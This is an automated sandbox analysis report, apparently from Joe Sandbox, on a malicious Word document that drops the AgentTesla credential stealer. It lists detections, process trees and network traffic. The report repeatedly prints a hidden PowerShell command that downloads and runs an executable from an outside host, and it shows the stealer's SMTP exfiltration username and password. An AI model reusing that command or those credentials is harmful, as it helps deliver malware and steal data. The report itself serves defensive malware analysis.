Windows Analysis Report 478644.doc

Overview

General Information

Sample Name: 478644.doc
Analysis ID: 553100
MD5: c0f8f2fc481e9be7141d84b401edf1f7
SHA1: ab1dbe841b083ea886c9023307c0527f7bfbfff3
SHA256: 4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected AgentTesla
Sigma detected: Powershell download and execute file
Document exploit detected (creates forbidden files)
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Yara detected Costura Assembly Loader
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Sigma detected: Verclsid.exe Runs COM Object
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2724 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2904 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 1308 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 292 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • okcff.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Roaming\okcff.exe" MD5: E9416A322E9A796D45588BC4FB04CD45)
        • cmd.exe (PID: 2028 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1972 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2104 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2060 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1864 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2100 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1892 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2780 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2712 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2228 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 448 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2632 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2792 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1188 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 836 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1308 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2424 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1204 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • okcff.exe (PID: 2176 cmdline: C:\Users\user\AppData\Roaming\okcff.exe MD5: E9416A322E9A796D45588BC4FB04CD45)
    • verclsid.exe (PID: 2432 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2652 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth |
  • 0x325b:$sb1: -W Hidden
  • 0x324b:$sc1: -NoP
  • 0x3255:$sd1: -NonI
  • 0x3265:$se3: -ExecutionPolicy bypass
  • 0x3250:$sf1: -sta

          Unpacked PEs

          Source | Rule | Description | Author | Strings
          41.0.okcff.exe.400000.9.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
          41.0.okcff.exe.400000.9.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
          41.0.okcff.exe.400000.13.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
          41.0.okcff.exe.400000.13.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
          9.2.okcff.exe.3605ff0.7.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

                    Sigma Overview

                    System Summary:

                    Sigma detected: Change PowerShell Policies to a Unsecure Level
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Microsoft Office Product Spawning Windows Shell
                    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: PowerShell DownloadFile
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Verclsid.exe Runs COM Object
                    Source: Process startedAuthor: Victor Sergeev, oscd.community: Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 2432
                    Sigma detected: PowerShell Download from URL
                    Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
                    Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Non Interactive PowerShell
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904

                    Data Obfuscation:

                    Sigma detected: Powershell download and execute file
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904

                    Jbx Signature Overview

                    AV Detection:

                    Found malware configuration
                    Source: 41.0.okcff.exe.400000.5.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}
                    Multi AV Scanner detection for submitted file
                    Source: 478644.doc, Virustotal: Detection: 41%
                    Source: 478644.doc, ReversingLabs: Detection: 30%
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe, Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Joe Sandbox ML: detected
                    Source: 41.0.okcff.exe.400000.5.unpack, Avira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.7.unpack, Avira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.9.unpack, Avira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.13.unpack, Avira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.11.unpack, Avira: Label: TR/Spy.Gen8
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

                    Software Vulnerabilities:

                    Document exploit detected (drops PE files)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: okcff[1].exe.0.dr
                    Document exploit detected (creates forbidden files)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
                    Document exploit detected (process start blacklist hit)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: global traffic, DNS query: name: mitmar-pl.com
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Code function: 4x nop then mov ecx, dword ptr [ebp-38h], 9_2_021AC348
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Code function: 4x nop then mov ecx, dword ptr [ebp-38h], 9_2_021AC43D
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh, 9_2_021AC915
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh, 9_2_021AC920
                    Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80
                    Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80
                    Source: Joe Sandbox View, ASN Name: WKD-ASIE WKD-ASIE
                    Source: global traffic, HTTP traffic detected: GET /okcff.exe HTTP/1.1; Host: mitmar-pl.com; Connection: Keep-Alive
                    Source: global traffic, HTTP traffic detected: GET /okcff.exe HTTP/1.1; Host: mitmar-pl.com; Connection: Keep-Alive
                    Source: global traffic, HTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1; Host: mitmar-pl.com; Connection: Keep-Alive
                    Source: Joe Sandbox View, IP Address: 37.0.9.166 37.0.9.166
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:18 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytes
